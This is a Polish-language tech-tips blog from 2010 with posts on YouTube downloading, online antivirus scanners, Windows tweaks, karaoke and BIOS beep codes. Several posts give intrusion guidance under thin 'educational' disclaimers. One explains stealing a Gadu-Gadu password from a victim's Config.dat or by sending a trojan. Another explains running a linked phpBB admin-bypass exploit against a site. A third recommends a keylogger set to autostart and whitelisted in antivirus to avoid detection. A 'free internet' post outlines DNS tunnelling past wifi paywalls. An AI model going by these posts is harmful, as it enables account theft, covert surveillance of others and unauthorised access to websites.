wtorek, 14 grudnia 2010

Jak pobrać film z youtube ? Pobieramy filmy z serwisu youtube zobacz jak przekonwertować film youtube flv na avi !

Jak pobrać film z serwisu youtube i przekonwertować format flv na avi !

Dzięki darmowym narzędziom online, możesz pobrać film z serwisu youtube i przekonwertować go z formatu flv na format avi. Zobacz jakie to proste i pobieraj filmy z youtube za darmo w formacie wideo avi !

Pierwszą polską stroną będzie http://pobieraczyoutube.pl/ - jednak tutaj nie mamy możliwości konwersji !  
 Bardzo dobrą stroną jest natomiast http://vixy.net/ - gdzie mamy możliwość wyboru w jakim formacie chcemy mieć końcowy film np. DIVX (avi) albo 3gp (telefony komórkowe). Wystarczy wrzucić odnośnik z filmem i gotowe : 

  Warto także wspomnieć o stronie http://keepvid.com./  - gdzie co prawda nie ma konwertera online , ale jest za to bezpłatnie do pobrania, link na tej samej stronie. 
Pliki z nie tylko youtube ale także masy innych serwisów pozwala nam pobrać strona - http://javimoya.com/blog/youtube_en.php 

Zachęcam do odwiedzenia także http://www.videodl.org/ - gdyby pozostałe strony przestały być aktywne, albo nam się nie podobały :P

Skaner antywirusowy online - przeskanuj komputer w internecie ! Antywirus online, skaner online, mks online !

Skaner antywirusowy online - przeskanuj komputer w internecie !

 Nie posiadasz zainstalowanego antywirusa, skorzystaj z darmowego narzędzia online, które przeskanuje twój komputer w poszukiwaniu wirusów. Zobacz najpopularniejsze skanery antywirusowe online - skanuj komputer online za darmo !
Skaner antywirusowy online jest bardzo poręczny, nie musisz go instalować na dysku -ponadto nie posiadasz dwóch antywirusów co jest nie wskazane, ze względu na to że mogą "się gryźć". Dlatego nigdy nie instaluj więcej niż jednego antywirusa ! 

Po pierwsze - ale tylko dla użytkowników przeglądarki Internet Explorer - http://www.mks.com.pl/skaner/ skaner MKS.  
Kolejnym antywirusem jest skaner firmy Panda http://www.pandasecurity.com/activescan/index/ - wystarczy kliknąć zielony przycisk Scan NOW i zainstalować plugin activescan ! 

Jeżeli chcemy przeskanować konkretny plik to warto skorzystać ze strony : http://www.kaspersky.pl/services.html?s=online_vir_chk - nie musimy tutaj niczego instalować, w tym przypadku plik jest wysyłany na serwer i sprawdzany pod kątem bezpieczeństwa : 


Szybki tzw. quick scan wykonamy na stronie BitDefender'a http://quickscan.bitdefender.com/ 
Trzeba jednak zainstalować dodatek do przeglądarki Firefox - dlatego na pasku na samej górze gdy klikniemy scan - wyskoczy okienko i wybieramy zezwól i instalujemy dodatek ! 

F Secure Scanner to kolejna strona do sprawdzania naszego systemu pod kątem wirusów : http://www.f-secure.com/en_EMEA/security/security-lab/tools-and-services/online-scanner/

Do wysyłania plików i ich szybkiego skanowania posłuży strona : http://www.virustotal.com/pl/ 
Strona jest całkowicie po polsku - wystarczy wybrać plik i wysłać go na serwer a po chwili dostaniemy raport o jego stanie. Oczywiście im większy jest plik tym więcej czasu się będzie wysyłał. Dlatego warto z tego rozwiązania korzystać w przypadku plików do kilku MB.  Co ważne dzięki tej stronie plik zostanie przeskanowany przez większość popularnych skanerów !! A oto skan z pliku ważącego ponad 3mb : 


Windows 7 triki i tipsy zobacz ukryte funkcje Windows 7 GodMode !

Ukryte funkcje w systemie Windows 7 - GodMode ! 
flickr,  techedlive

Zobacz jakie możliwości daje ci Windows 7 - na pewno nie poznałeś wszystkich sztuczek i trików, które oferuje ten system. Zobacz ciekawą funkcję w systemie Windows 7 jaką jest tryb GodMode tzw. boski tryb.
Być może i dobrze - bo mógłby coś namieszać :P Ale istnieje sposób aby odkryć potencjał, który drzemie właśnie w tych niedostępnych opcjach. 
Jeżeli chcesz mieć dostęp do wszystkich ustawień konfiguracyjnych systemu Windows 7 stwórz nowy folder np. na pulpicie i jako nazwę wpisz poniższy ciąg znaków :
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}  
Na pewno zauważysz różnicę ! Będzie to nie tylko zmiana wyglądu ikony folderu, ale także jego zawartości :) Może nieco przekłamałem wyżej informację o nowych funkcjach - ponieważ wszystko co znajdziesz w tym miejscu jest rzeczywiście dostępne min. z poziomu panela sterowania itp...
Zaletą tego rozwiązania jest fakt - że wszystko mamy w jednym - konkretnym miejscu ! 
Źródło : http://pclab.pl 

Karaoke na komputer - śpiewaj na komputerze dzięki Karaoke ! Darmowe Van Basco Karaoke !

Śpiewaj dzięki darmowemu Karaoke - zrób domową imprezę !
http://www.vanbasco.com/

Chcesz zabawić towarzystwo, urządź w domu darmowe karaoke - świetna zabawa gwarantowana.
Zobacz jaki program do karaoke będzie najodpowiedniejszy dla ciebie - ściągnij darmowe karaoke na komputer.
Mowa tutaj chyba o najpopularniejszym programie stworzonym do tego celu a mianowicie VanBasco Karaoke Player 2.53 do pobrania z tej strony : http://www.vanbasco.com/download.html - klikamy download !
Spolszczenie znajdziemy natomiast na tej stronie : http://www.vanbasco.com/downloads/vanbasco_polish.exe 

 Program jest banalny w obsłudze i na pewno każdy sobie z nim poradzi. Nie jest wymagany mikrofon - działa bez niego ! Ale oczywiście jeżeli chcemy nagrać własny wokal to się przyda :)
Program ma bardzo dużą bazę plików karaoke - w internecie jest ich cała masa od starych hitów po najnowsze produkcje. VanBasco Karaoke odczytuje pliki w takich formatach jak : MID, MIDI, KAR, RMI.
Program jest kompatybilny z najnowszym systemem Windows 7.

Warto pobierać w większości pliki *kar - gdyż nie każdy plik midi zawiera tekst - żebyśmy się nie zdziwili że leci np. sama muzyczka :P
Co do plików karaoke to znajdziesz je np. http://www.karaoke-fans.yoyo.pl/ oraz http://www.kara4u.pl/ 
Masa utworków dostępna jest na różnego rodzaju forach np. http://forum.o2.pl/temat.php?id_p=4822124&start=90 - należy pamiętać o licencji ! 
Wiele ciekawych plików znajdziesz również pod adresem : http://katalog.onet.pl/katalog.html?qt=karaoke 


Ostatnio cieszą się także powodzeniem takie strony jak np. http://jakelvis.onet.pl/ - darmowe karaoke online z możliwością pokazania się innym. Istniej możliwość nagrywania piosenek a nawet wideo ze swoim udziałem - następnie można poddać się ocenie.


 A tak wygląda ekran do śpiewania online :


 Podobną ciekawą inicjatywą jest strona http://ising.pl/ 
Piosenek do wyboru podobnie na stronie powyżej - baaarrdzzooo dużo 
Zresztą strona działa podobnie jak wyżej - możemy być oceniani i oceniać występy innych.
Ostatnią ze stron - mniej znana jest strona http://www.karaoke.omeba.pl/podklady/ 
Zresztą zobaczcie i pośpiewajcie sami :)

piątek, 10 grudnia 2010

Jak włamać się na gadu gadu ? Jak włamać się na gg - luki w gadu gadu. Zobacz jak zabezpieczyć się przed atakiem gadu gadu.

Jak włamać się na gadu gadu - zabezpiecz się przed atakiem GG.
Sztuka podstępu - atak na gadu gadu.
flickr, y Erin!

Zobacz w jaki sposób, można bez wiedzy osoby dostać się na jej numer gadu gadu - poznaj podstawowe metody ataku na gadu gadu i skutecznie się przed nimi zabezpiecz.

Po pierwsze należy zdawać sobie sprawę z tego co chcemy osiągnąć i w jakim celu ? Należy pamiętać że rzeczy typu : włamanie do czyjegoś komputera, przechwycenie jego informacji itp... jest karalne. 
Przyjmijmy więc, że mamy dwa komputery i na nich jest zainstalowany komunikator a my chcemy spróbować zdobyć hasło jednego z nich. 


Nie ma tutaj mowy o włamaniu na serwery gadu gadu aby zdobyć hasło - jeżeli czytasz ten artykuł to o takich rzeczach możesz zapomnieć :) 
Istnieją teraz dwie drogi w których to hasło można uzyskać - po pierwsze jeżeli mamy dostęp do komputera "ofiary" to możemy wyciągnąć pliki, które przechowują takie informacje (config.dat) - w drugim przypadku, gdy nie mamy dostępu fizycznego trzeba posłużyć się narzędziami, które pozwolą na zdalny dostęp do komputera (np. Trojan).

 

A więc do dzieła :  

Wchodzimy do folderu na dysku głównym np. C:\Documents and Settings i odnajdujemy folder z nazwą naszego użytkownika np. C:\Documents and Settings\Pececik.
Następnie odnajdujemy folder z gadu gadu "Gadu-Gadu" i klikamy na niego. 
Gdy będziemy w środku powinniśmy ujrzeć kilka folderów z nazwami założonych kont w naszym komunikatorze. Wchodzimy do wybranego przez nas celu i kopiujemy plik o nazwie "Config.dat" - to właśnie w nim przechowywane jest nasze hasło do komunikatora gadu gadu ! 

Aby odczytać hasło z takiego pliku, wystarczy posłużyć się teraz odpowiednim narzędziem np. Gadu Gadu Password Reader albo Gadu Gadu password recovery 
Za pomocą nich odczytamy - po prostu podając lokalizację skopiowanego pliku config.dat - hasło do konta gadu gadu.
Jest to prosty sposób na poznanie hasła do komunikatora gg - oczywiście musimy mieć tutaj dostęp do komputera ofiary, chociaż przez chwilkę ! 

Jeżeli nie mamy dostępu do komputera "ofiary" należy posłużyć się jednym z dostępnych w internecie trojanów i spróbować w jakiś sposób podesłać naszemu "celowi". Jednak mniej doświadczony użytkownik może sam "nadziać się" na własne sidła - kto mieczem wojuje od miecza ginie.

 Kilka technik obronnych przed tego typu atakami : 

Na dzisiejszy dzień - ten atak może wydawać się nieco "stary" i nie aktualny - jednak możemy się grubo mylić. Najsławniejszy haker świata Kevin Mitnick w swojej książce "Sztuka Podstępu" napisał, że głównym jego działaniem nie było łamanie haseł, tylko łamanie ludzi.
To właśnie człowiek jest najsłabszym elementem - dzięki któremu jesteśmy w stanie pozyskać mocno zabezpieczone dane.
A więc skuteczną obroną jest wiedza - znamy technikę ataku, a więc możemy się zabezpieczyć. 
Należy pamiętać aby pod żadnym pozorem nie przysłać części plików np. programu gadu gadu znajomemu, który napisze nam sms-a albo email, że uszkodził mu się komunikator i potrzebuje jednego pliku. 
Pomimo, że być może kogoś znamy, jeżeli nie wiemy za co odpowiada konkretny plik - warto się powstrzymać - ktoś kiedyś powiedział, że nie boi się swoich wrogów ale przyjaciół - być może coś w tym jest :)
 

Jak usunąć wpisy w dodaj usuń - usuwanie nieaktualnych wpisów z dodaj i usuń programy.

Jak usunąć nieaktualne wpisy z Dodaj/Usuń programy ?

 Zobacz jak usunąć nieaktualne i zalegające wpisy w narzędziach systemu windows - w panelu sterowania Dodaj/Usuń programy. Dzięki temu zachowasz porządek w komputerze.

 Aby pozbyć się tych pozostałości musimy zmodyfikować rejestr - w tym celu przechodzimy odpowiednio: 
start >> uruchom i wpisujemy : regedit
zatwierdzamy enterem i wyszukujemy klucza o podanym ciągu (*rozwijamy gałęzie) :
HKEY_LOCAL_MACHINE >> SOFTWARE >> Microsoft >> Windows >> CurrentVersion >>Unistall  
Po odnalezieniu klucza widzimy aplikacje, które rzekomo są zainstalowane. Jeżeli chcemy się jakiejś pozbyć z panelu sterowania dodaj/usuń - wystarczy że usuniemy odpowiedni wpis. W tym celu klikamy na niego prawym klawiszem myszki i wybieramy usuń. 
 

czwartek, 9 grudnia 2010

Darmowy internet - jak mieć darmowy internet. Jak korzystać z darmowego internetu. Serwery DNS za darmo !

Jak korzystać z darmowego internetu - darmowy internet czy to możliwe ?

Chcesz skorzystać z darmowego dostępu do internetu - masz kartę bezprzewodową, która wykrywa sieci wifi. Zobacz w jaki sposób uzyskać dostęp do darmowego internetu.
Oczywiście wszystko będzie zgodne z prawem - jeżeli nie będziemy łamać hasła danej sieci oraz regulaminu, który zabroniłby posługiwanie się serwerami DNS. 
To właśnie dzięki DNS - będziemy w stanie obejść zabezpieczenia i bezpłatnie korzystać z dobrodziejstw internetu bezprzewodowego wifi. 
Co to jest serwer DNS ?

Tak w skrócie to opiera się to na przypisywaniu nazw numerom IP np. strona pececik.blogspot.com - posiada adres o numerze 209.85.135.191 - jest to adres jednocześnie do Google'a - ponieważ serwer (blogspot) należy do tej firmy. A więc gdy w przeglądarce wpiszemy np. 209.85.135.191 - pojawi się nam przeglądarka Google. 
Zaletą serwerów DNS jest właśnie to, że nie musimy pamiętać tych cyferek - a wystarczy tylko nazwa/adres - np. www.pececik.blogspot.com albo www.google.pl

Odpowiednia konfiguracja serwera DNS ...

Na starcie trzeba przygotować własny serwer DNS, za pomocą którego będziemy mogli łączyć się (przekierować pakiety)  z naszym punktem dostępowym wifi.
Najlepszym wyjściem byłoby gdybyś posiadał stały numer IP - gdyż lokalizacja utworzonego serwera będzie taka sama.
W przypadku osób korzystających z neostrady itp. (ze zmiennym numerem IP) zarejestrujmy się na stronie http://www.dyndns.com/.

 Po zarejestrowaniu i zalogowaniu się na konto klikamy na przycisk :My services oraz Add Host Services.
Następnie w polu Host name wpisujemy nazwę która będzie odpowiadała naszej domenie np. pececik - całość będzie wyglądać w ten sposób : pececik.dnydns.com
Następnie trzeba podać adres numeru IP, który aktualnie posiadamy (IP address) - z menu rozwijanego po prawej stronie. Gdy skończymy klikamy : create host !

Należy jednak posiadać własną domenę internetową, która troszkę może kosztować. Chodzi o to aby wysyłać zapytania do naszego serwera. Gdy mamy własną domenę to w niej trzeba utworzyć poddomenę np. domeną jest blogspot.com a poddomeną pececik.blogspot.com  - musi być ona wpisana jako alias. 
Jako hosta podajemy adres ip naszego komputera - lub tego z dnydns - jeżeli mamy dynamiczne IP.

Jest to nieco skomplikowane - ale wydaje mi się, że ci co będą chcieli skorzystać z tej opcji sobie poradzą.



Jak oglądać filmy 3d. Darmowe filmy 3d - oglądaj stereogramy 3d.

Jak oglądać filmy 3d - darmowe filmy 3d. Oglądaj stereogramy 3d za darmo !

flickr, lumaxart
Zobacz jakie korzyści przynoszą efekty 3d - przekonaj się czym jest trójwymiarowa rzeczywistość na swoim ekranie. Oglądaj darmowe stereogramy 3d oraz filmy w technologii 3d. Ciesz się darmowymi animacjami 3d - zobacz na czym polega trójwymiarowy obraz.

Czym są filmy 3d ?
Są to normalne filmy - oglądając je mamy jednak wrażenie jakbyśmy znajdowali się w środku sceny. Wszystko wydaje nam się tak "blisko - wręcz dotykalnie". Główna technika wyświetlania takich filmów opiera się na przekazywaniu oku prawemu innego obrazu niż oku lewemu. Można to uzyskać poprzez kombinację kolorów np. niebieskiego i czerwonego albo zielonego i czerwonego tzn. jedno oko odbiera jeden kolor. 
Druga technika polega na wyświetlaniu filmu z większą ilością klatek - 48 - dla jednego oka dla drugiego oka - jest to możliwe dzięki specjalnym okularom tzw. LCD shutter glasses, które są zasilane.
Istnieją także inne ciekawe rozwiązania - próbuje się stworzyć technologię(*już jest), dzięki której możliwe będzie oglądanie filmów bez okularów. 


3d-hobby.com
Bardzo dobra strona, która opisuje działanie okularów 3d i możliwości ich wykorzystania w domowym zaciszu. Opisuje np. czy divx jest odpowiednim formatem dla filmów 3d, albo dlaczego jakość obrazu może być gorsza : http://www.3d-hobby.com.pl/index.php?option=com_content&view=article&id=51:co-nie-tak-z-tym-3d&catid=35:anaglyph&Itemid=55

Co to są stereogramy - jak na nie patrzeć ?

Są to obrazy, które sprawiają wrażenie trójwymiarowych - na pierwszy rzut oka wydają się być zwykłymi plamkami albo jakimiś dziwnymi malowidłami. W rzeczywistości jest to "ukryty obraz" - który możemy zobaczyć albo poprzez odpowiednie oddalenie, przybliżenie wzroku albo poprzez specjalne okulary. 
Np. stereogram który przedstawia rekina : 

GNU, http://pl.wikipedia.org/, Fred Hsu

Więcej ciekawych stereogramów znajdziecie na stronie http://www.eyetricks.com/3dstereo.htm

http://www.3dstereo.com.pl/prezentacje.htm

Ciekawa strona poświęcona efektowi 3d - znajduje się pod adresem : http://www.3dstereo.com.pl/
Inne ciekawe stereogramy to np :
Pochodzą one ze strony : http://www.netaxs.com/ i prezentują odpowiednio psa , delfina oraz motyla. 
Odpowiednie wpatrywanie - oddalanie albo przybliżanie wzroku - pozwoli zobaczyć ukryty obraz. 
Na stronie : http://www.stereogramy.com/ - znajduje się np. gra zrobiona jako stereogram. 

Jak oglądać filmy 3d na youtube ! 

Istnieje taka możliwość - wystarczy tylko odnaleźć film zrobiony w odpowiedniej technice. Oto przykładowy - testowy - film w jakości 3d : 

Na dole mamy - styl widoku 3d - gdzie możemy zmienić technologię wyświetlania filmu. Aby oglądać te i inne filmiki 3d potrzebujemy niestety okularów z filtrem 3d.


Sposób na domowe - naprawdę prowizoryczne okulary 3d : 



wtorek, 7 grudnia 2010

Jak używać exploita ? Czym jest exploit ? Haker, IT - exploity i bugi jak wykorzystać luki w zabezpieczeniach.

Co to jest exploit - jak działa exploit. Zobacz jak wykorzystać bugi czyli luki w zabezpieczeniach.

 flickr, combust

Exploity to nic innego jak pewnego rodzaju programy (kody), których zadaniem jest złamanie zabezpieczeń danej aplikacji. Można by powiedzieć, że exploit to taka furtka, która umożliwia min. hakerom dostęp do niepowołanych treści - dlatego warto wiedzieć jak one działają, aby się przed nimi zabezpieczyć.

Dzięki exploitom możemy np. włamać się do panelu administratora forum phpbb nie znając hasła ! 

Najpopularniejsza strona mająca sporo takich kodów znajduje się pod adresem http://www.milw0rm.com/exploits
Przykładowy exploit dotyczący forum phpbb 2.0.13 znajduje się na stronie http://www.milw0rm.com/exploits/1247 
Aby korzystać (uruchomić, odpalić) część exploitów , potrzebujemy odpowiednich narzędzi, w przypadku przykładu powyżej - exploita dot. forum phpbb 2.0.13 będzie nam potrzebny Active Perl, który pobierzemy np. z tej strony : http://www.activestate.com/activeperl/downloads/

To właśnie pierwsza linijka na samej górze kodu informuje nas w czym został stworzony exploit - gdzie go mamy uruchomić. W tym przypadku "#!/usr/bin/perl" informuje nas właśnie o tym, że musimy użyć perl'a !
Kolejną ważną rzeczą są rozszerzenia, które czyta Active Perl - a mianowicie są to :  *pl oraz *plx i właśnie do takich należy zapisać nasz kod. 
Nie może to być plik tekstowy - trzeba ten kod skopiować np. do notatnika i zapisać ponownie z rozszerzeniem np. nazwa.pl albo nazwa.plx

Następnie musimy zobaczyć w instrukcję exploita tzn. czego dotyczy i w jaki sposób go uruchomić - przeważnie jest to polecenie w konsoli (start/uruchom/ cmd)
c:\perl\bin\perl c:\nazwa_exploita.pl www.strona.pl ......
 
Pierwsza część odpala nam środowisko Active Perl , druga część czyli 
c:\nazwa_exploita.pl - tutaj podajemy nazwę exploita i 
jego lokalizację na komputerze
Ostatnią część np. www.strona.pl - to w zależności co robi 
dany exploit - w przypadku
gdy nie wiemy co dany exploit wykonuje wystarczy w 
konsoli wpisać komendę :
c:\perl\bin\perl c:\nazwa_exploita.pl
A wyskoczy nam stosowny przykład jak użyć danego exploita ! 
Źródło : http://kacper.bblog.pl , Kacper


poniedziałek, 6 grudnia 2010

Keylogger po polsku do pobrania - krok po kroku. Jak obsługiwać keylogger - zapisywanie klawiszy.

Keylogger po polsku do pobrania - zobacz kto buszuje w twoim komputerze i co robi. Pobierz darmowy keylogger, który zapisze naciskane klawisze.

 flickr, Darcy McCarty

Jest to artykuł pokazujący możliwości keyloggera - dzięki niemu będziesz mógł zobaczyć jakie klawisze są naciskane na klawiaturze twojego komputera. Darmowy keylogger po polsku pobierasz i użytkujesz na własną odpowiedzialność - a artykuł służy wyłącznie celom edukacyjnym.

Dlatego jest to artykuł tylko mający pokazać ci w jaki sposób działa keylogger i jak może być on niebezpieczny - testuj go tylko na sobie :)

 A więc co to jest keylogger - jest to taki mały programik "szpieg", który siedzi niewidoczny w twoim komputerze i zapisuje wszystko co na nim robisz tzn. jakie klawisze naciskasz na klawiaturze, jakie strony internetowe odwiedzasz itp...

Istnieje możliwość uruchamiania automatycznie takiego keyloggera przy każdym starcie systemu. Oczywiście jeżeli posiadamy antywirusa może on być uznany za szkodnika, którego należy usunąć. Istnieje możliwość zgłoszenia np. w Avaście faktu, że plik który przeskanował to tzw. "fałszywy alarm" - dzięki czemu program antywirusowy zostawi go w spokoju ! 


Ciekawym i skutecznym jest wersja shareware Ghost Keylloger : http://programy.downloadcentral.pl/?GhostKeylogger/Nadzor/Bezpieczenstwo/pobierz/537 

A tutaj filmik pokazujący zasadę działania keyloggera pod systemem Windows 7 - przechwytywania wszystkich stukniętych w klawiaturę klawiszy :

Jak zmienić nazwę procesora, jak zmienić nazwę komputera. Jak oszukać nazwę procesora i karty graficznej.

Zobacz jak zmienić opis komputera - zmiana nazwy procesora, zmiana nazwy użytkownika we właściwościach Mojego Komputera.


Zobacz jak zmienić nazwę procesora, czy nazwę użytkownika we właściwościach Mój komputer - nabierz znajomego że masz np. procesor 30GHz ;)

Oczywiście nie zmieni to zachowania naszego procesora - nie będzie on szybciej pracował - zmieni się tylko jego nazwa we właściwościach mojego komputera. Oznacza to tyle, że jak ktoś przeskanuje komputer np. Everestem to pokażą się prawdziwe informacje. 

Po pierwsze otwieramy rejestr (start/ uruchom i wpisujemy regedit ) znajdujemy gałąź : HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\Current Version\ i tam powinien pojawić się taki wpis jak : RegisteredOwner oraz RegisteredOrganization
Modyfikujemy te dane wpisując własne wartości *(klikamy 2 razy) - podajemy nazwę organizacji i na kogo jest system zarejestrowany. 
Istnieje tam więcej pól do modyfikacji np.
ProductName - zmiana nazwy systemu operacyjnego itp..

Microsoft sam na swojej stronie w dziale support - podaje w jaki sposób dokonać ręcznego znakowania systemu. 

Dzięki temu możemy zamiast loga Windows - dodać własne logo np. nasze zdjęcie ;)
Jeżeli jednak nie czujemy się mocni w te klocki - albo zależy nam na czasie - to istnieje program do zmiany tego typu - nazywa się CT OEM Logo Changer do pobrania na stronie :

sobota, 4 grudnia 2010

Dźwięk z głośnika systemowego. Oznaczenia dźwięków w Windows - dźwięki w biosie. Piski systemowe co to znaczy.

Komputer piszczy co to znaczy - piski komputerowe. Dźwięki komputera przy starcie - co oznaczają dźwięki z głośnika systemowego.
Podczas startu systemu słyszysz niepokojące piski - być może twój komputer, jego podzespoły zostały uszkodzone - sprawdź co może być przyczyną pisków głośnika systemowego.
Komputer dzięki tym znakom wskazuje nam przyczynę usterki. Najczęściej w takich przypadkach nasz komputer nie chce się uruchomić - dlatego sygnalizacja pozostaje tylko dźwiękowa. Postaram się tutaj opisać co może być przyczyną takiego zachowania : 
 
Award Bios

1 krótki - wszystko w porządku ! (zawsze jest przy starcie)
1 długi - coś z pamięcią ram ! 
1 krótki , 2 długie - problemy z kartą graficzną ! 
1 długi , 2 krótkie - sprawdź pamięć ram (problem z parzystością) 
3 długie - sprawdź czy klawiatura jest podłączona (lub/i czy jest sprawna)
Brak sygnałów - sprawdź czy zasilacz działa (ewentualnie jest coś z głośnikiem systemowym ) !
Ciągły - problemy z pamięcią RAM lub kartą graficzną !

Phoenix Bios 

 1 krótki - wszystko w porządku ! (zawsze jest przy starcie)
 krótki, 3x krótki , krótki, krótki - problemy z pamięcią ram ! 
 krótki, 3x krótki , krótki, 3x krótki - problemy z klawiaturą  !

Ami Bios (krótkie)

1 - problemy z odświeżaniem pamięci RAM
2 - sprawdź pamięć ram (problem z parzystością) 
3 - problemy z kością pamięci 
4 - problem z zegarem płyty głównej
5 - problemy z procesorem
6 - problemy z kontrolerem klawiatury
8 - problem z kartą graficzną 
11 - problemy z pamięcią cache
dźwięk ciągły - błąd RAM lub karty graficznej !

Źródło : ocforum.pl (Allen) oraz www.poradykomputerowe.pl

Jak usunąć nieaktualne wpisy dodaj usuń programy ?

Jak usunąć nieaktualne wpisy w dodaj usuń programy ?

Czasami gdy ręcznie pozbędziemy się jakiegoś programy - pozostanie po nim wpis w panelu sterowania/ dodaj usuń programy. Aby pozbyć się tych pozostałości musimy zmodyfikować rejestr - w tym celu przechodzimy odpowiednio: 
start >> uruchom i wpisujemy : regedit
zatwierdzamy enterem i wyszukujemy klucza o podanym ciągu (*rozwijamy gałęzie) :
HKEY_LOCAL_MACHINE >> SOFTWARE >> Microsoft >> Windows >> CurrentVersion >>Unistall  
Po odnalezieniu klucza widzimy aplikacje, które rzekomo są zainstalowane. Jeżeli chcemy się jakiejś pozbyć z panelu sterowania dodaj/usuń - wystarczy że usuniemy odpowiedni wpis. W tym celu klikamy na niego prawym klawiszem myszki i wybieramy usuń. 
 

poniedziałek, 29 listopada 2010

Jak wyłączyć autoodtwarzanie pendrive ? Wyłączamy autoodtwarzanie usb !

Jak wyłączyć autoodtwarzanie dysków usb ! 
Wyłączamy automatyczne odtwarzanie USB !



Dowiedz się jak zwiększyć bezpieczeństwo komputera i wyłącz automatyczne odtwarzanie nośników usb oraz napędów cd/dvd - dzięki temu twój system będzie bezpieczeniejszy.

Większość wirusów działa w ten sposób, że po włożeniu płyty do napędu albo podpięciu usb do komputera - załącza się plik autorun.inc - który zaraża nasz komputer. Żeby nie było teraz nie jasności. Sam plik autorun.inc nie jest wirusem ! On tylko "opisuje" co ma zostać uruchomione po włożeniu nośnika do komputera. A więc jeżeli zostanie do niego przypisany wirus to właśnie on się automatycznie uruchomi. 
Aby wyłączyć opcję autoodtwarzania wchodzimy do menu start/uruchom i wpisujemy gpedit.msc
Następnie przechodzimy do zakładek Konfiguracja Komputera / Szablony Administracyjne / System oraz Wyłącz funkcję autoodtwarzanie ...


Następnie zaznaczamy tą pozycję dwa razy i w nowym okienku (wyłącz funkcję autoodtwarzanie) , zaznaczamy włączone - dla wszystkich dysków :
Wyłącz autoodtwarzanie na wszystkie dyski ! 
Sposób ten wyłącza funkcję odtwarzania automatycznego ale tylko do momentu jeżeli nie klikniemy na dysk. np. cd-rom dwa razy klawiszem. Oczywiście wszystkie płyty i inne nośniki po włożeniu do komputera działają tak samo jak działały (nie myślcie że ta funkcja wyłącza np. stację cd-rom :P ).

Istnieje także skuteczna metoda z rejestrem pozwalająca się dodatkowo zabezpieczyć przed klikiem w napęd o czym napisałem wyżej :



Ze strony Microsoft można przeczytać jak wyłączyć autoodtwarzanie dla innych systemów niż windows xp np. w Viście będzie to odpowiednio : 


sobota, 27 listopada 2010

Przyśpiesz windows za darmo ! Jak przyśpieszyć komputer z systemem Windows ?

Przyśpiesz komputer za darmo - bez wymiany podzespołów.
Twój system może działać znacznie szybciej !

Zobacz w jaki sposób sprawić, aby twój komputer działał znacznie szybciej - jeżeli masz dodatkową pamięć przenośną Flash USB to ten poradnik jest dla ciebie ! Dzięki zawartym tutaj poradom, dowiesz się jak przyśpieszyć za darmo komputer.

Dzięki użyciu pamięci flash Usb - możemy przyśpieszyć pracę systemu Windows. Jak powszechnie wiadomo pamięci USB posiadają znacznie szybszy dostęp do plików (*szybszy zapis i odczyt) niż standardowe dyski twarde. Urządzenie musi posiadać funkcję ReadyBoost - dzięki czemu po podłączeniu do komputera (wyskoczy autoodtwarzanie) będziemy mieć możliwość wyboru pozycji : "przyspieszenie systemu za pomocą Ready BOOST". Następnie na karcie która wyskoczy (właściwości) zaznaczamy "użyj tego urządzenia" ! Po wszystkim ustalamy ilość miejsca na dysku usb - pamiętaj o poniższej wskazówce.
Powinno się wkładać dysk USB o pamięci 1-3x takiej - jaką kość ram mamy włożoną do komputera. W przypadku pamięci 2GB - możemy użyć dysku o pojemności 6GB(*wykorzystywana pojemność do przyspieszenia systemu ustalona na 6GB). 
Aby sprawdzić czy Ready Boost jest ogólnie włączony wchodzimy odpowiednio : start \ uruchom i wpisujemy : services.msc
Następnie odszukujemy w usługach pozycję ReadyBoost - i sprawdzamy jej stan. Jeżeli wyświetla się "uruchomiono" to znaczy, że wszystko jest w porządku ! 
Chodzi tutaj o rozbudowę pamięci wirtualnej systemu, dzięki czemu możemy usprawnić jego pracę poprzez wzrost wydajności. 

piątek, 26 listopada 2010

Jak zabezpieczyć laptopa przed kradzieżą ?

Jak zabezpieczyć laptopa przed kradzieżą - zobacz co zrobić, aby twój laptop był bezpieczniejszy !

flickr, f650biker

Lepiej zapobiegać - dlatego przygotuj laptopa w ten sposób, aby w przypadku kradzieży łatwo było go odzyskać. Zobacz jakimi sposobami możesz zabezpieczyć swojego laptopa przed kradzieżą !

Istnieją programy dzięki którym możemy w prosty sposób namierzyć naszego laptopa po kradzieży. 
Nie potrzeba tutaj wcale nawigacji GPS ale jedynie dostępu do internetu. W momencie gdy złodziej skorzysta z laptopa w miejscu gdzie istnieje dostęp do internetu - laptop automatycznie wyśle wiadomość pocztową na podany wcześniej przez nas adres. Dzięki temu policja będzie w stanie namierzyć złodzieja i odzyskać nasz komputer.
Prey to program, który wysyła raport na wskazany adres email z takimi informacjami jak np. ostatnio odwiedzane strony internetowe, lista sieci bezprzewodowych w okolicy, screeny pulpitu a nawet zdjęcie złodzieja - wcześniej zrobione za pomocą kamerki internetowej ! 
Program jest bezpłatny i można go pobrać z tej strony : http://preyproject.com/ , klikając na przycisk : 

 

Jak zrobić ukryty folder ? Niewidoczny folder w Windows !

Ukryty folder w Windows - jak zrobić niewidoczny folder.

Przy tworzeniu nowego pliku czy foldera trzeba wprowadzić jego nazwę. Gdy tego nie zrobimy to nie da się go zapisać - wyskoczy komunikat o błędzie. Gdyby istniała taka możliwość moglibyśmy np. zmienić jego ikonę na przeźroczystą (bez ikonki) i dzięki temu nie byłby on widoczny ! 
 
Istnieją jednak tzw. specjalne znaki - których nie widać na klawiaturze. Ale odpowiedni kod z klawiatury numerycznej poprzedzony klawiszem alt - pozwala na wprowadzenie nowego znaku specjalnego. 
My posłużymy się tzw. twardą spacją - która dla folderów jest dozwolona i wystarczająca. 
W tym celu zaznaczamy nasz plik, klikamy prawym klawiszem myszki i wybieramy zmień nazwę. (albo klawisz f-12). Następnie cały czas trzymamy lewy klawisz ALT oraz wpisujemy koniecznie z klawiatury numerycznej 0160. 
A więc ALT + 0160 
Od teraz folder będzie bez nazwy - wprowadziliśmy tzw. twardą spację - możemy zakończyć enterem. 
Więcej takich znaków specjalnych możemy znaleźć na stronie http://www.ajmoreau.com/altcodes.html

Podobnie nie zrobiłbyś § - takiego znaku nie znając specjalnego kodu :) Jest to znak paragrafu - robi się go przy pomocy kodu alt+21

czwartek, 25 listopada 2010

Jak usunąć plik odmowa dostępu, plik jest używany. Jak usunąć niechciany plik - plik chroniony jak usunąć ?

Jak usunąć pliki chronione, jak usunąć plik z odmową dostępu ?
Kasujemy pliki nieusuwalne !
flickr, cote


